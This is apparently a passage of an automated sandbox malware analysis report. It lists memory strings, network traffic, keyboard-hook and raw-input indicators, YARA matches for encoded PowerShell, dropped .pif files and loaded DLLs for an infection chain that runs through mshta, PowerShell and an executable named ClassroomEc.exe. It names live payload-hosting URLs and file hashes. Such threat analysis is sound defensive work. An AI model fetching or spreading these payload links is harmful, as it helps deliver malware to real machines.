              Source: ClassroomEc.exe, 00000008.00000003.2117904067.000000000371C000.00000004.00001000.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2788452497.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
              Source: powershell.exe, 00000004.00000002.2120550073.0000000007969000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: powershell.exe, 00000004.00000002.2114476212.000000000610D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: powershell.exe, 00000004.00000002.2114476212.000000000610D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: powershell.exe, 00000004.00000002.2114476212.000000000610D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: powershell.exe, 00000004.00000002.2114476212.000000000610D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: powershell.exe, 00000004.00000002.2114476212.000000000610D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
              Source: powershell.exe, 00000002.00000002.2189639078.00000000060F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2114476212.0000000005FC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000004.00000002.2114476212.000000000610D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: powershell.exe, 00000004.00000002.2114476212.000000000610D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: powershell.exe, 00000004.00000002.2114476212.000000000610D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: powershell.exe, 00000004.00000002.2114476212.000000000610D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: ClassroomEc.exe, 00000008.00000003.2117904067.000000000371C000.00000004.00001000.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2788452497.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
              Source: ClassroomEc.exe, 00000008.00000003.2117904067.000000000371C000.00000004.00001000.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2788452497.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
              Source: ClassroomEc.exe, 00000008.00000003.2117904067.000000000371C000.00000004.00001000.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2788452497.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
              Source: ClassroomEc.exe, 00000008.00000003.2117904067.000000000371C000.00000004.00001000.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2788452497.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
              Source: powershell.exe, 00000004.00000002.2106290397.00000000050B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000004.00000002.2106290397.00000000050B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000002.00000002.2166561428.0000000005091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2106290397.0000000004F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.2106290397.00000000050B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: ClassroomEc.exe, 00000008.00000003.2117904067.000000000371C000.00000004.00001000.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2788452497.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
              Source: ClassroomEc.exe, 00000008.00000003.2117904067.000000000371C000.00000004.00001000.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2788452497.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
              Source: powershell.exe, 00000004.00000002.2106290397.00000000050B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://whitemansearch.shop
              Source: powershell.exe, 00000004.00000002.2106290397.00000000050B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://whitemansearch.shop/ClassroomEc.exe
              Source: powershell.exe, 00000004.00000002.2106290397.00000000050B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: ClassroomEc.exe, 00000008.00000003.2117904067.000000000371C000.00000004.00001000.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/X
              Source: powershell.exe, 00000004.00000002.2114476212.000000000610D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
              Source: powershell.exe, 00000004.00000002.2120973293.00000000079E2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2106290397.00000000050B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2120550073.000000000799B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/2ZrVm4
              Source: powershell.exe, 00000004.00000002.2106290397.00000000050B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2no.co/2ZrVm4;Set-ItemProperty
              Source: powershell.exe, 00000004.00000002.2120550073.000000000799B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/2ZrVm4hn
              Source: powershell.exe, 00000002.00000002.2166561428.0000000005091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2106290397.0000000004F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000004.00000002.2114476212.0000000005FC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.2114476212.0000000005FC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.2114476212.0000000005FC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000004.00000002.2106290397.00000000050B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.2166561428.00000000058B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.2189639078.00000000060F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2114476212.0000000005FC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: ClassroomEc.exe, 00000008.00000003.2117904067.000000000371C000.00000004.00001000.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2788452497.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
              Source: Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.5:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.5:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49732 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 8_2_00A78CD0 SetWindowsHookExW 00000002,Function_00008B60,00000000,000000008_2_00A78CD0
              Source: Identification.pif, 00000013.00000003.2954114221.0000000008B10000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_be942963-8
              Source: Identification.pif, 00000013.00000003.2954114221.0000000008B10000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_5815d150-a
              Source: Yara matchFile source: 19.3.Identification.pif.8b10000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.3.Identification.pif.8b10000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.3.Identification.pif.88f0000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000013.00000003.2954114221.0000000008B10000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000003.2953940198.00000000088F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Identification.pif PID: 8140, type: MEMORYSTR

              System Summary

              barindex
              Source: amsi32_4408.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 4820, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 4408, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\ClassroomEc.exeJump to dropped file
              Source: C:\Windows\SysWOW64\cmd.exeProcess Stats: CPU usage > 49%
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_BITS_5248_335274008Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04D5FAE84_2_04D5FAE8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04D5FAD84_2_04D5FAD8
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 8_2_00A980318_2_00A98031
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 8_2_00A9810B8_2_00A9810B
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 8_2_00A983A38_2_00A983A3
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 8_2_00A927F08_2_00A927F0
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.pif F58D3A4B2F3F7F10815C24586FAE91964EEED830369E7E0701B43895B0CEFBD3
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif F58D3A4B2F3F7F10815C24586FAE91964EEED830369E7E0701B43895B0CEFBD3
              Source: Producing.8.drStatic PE information: No import functions for PE file found
              Source: Producing.8.drStatic PE information: Data appended to the last section found
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
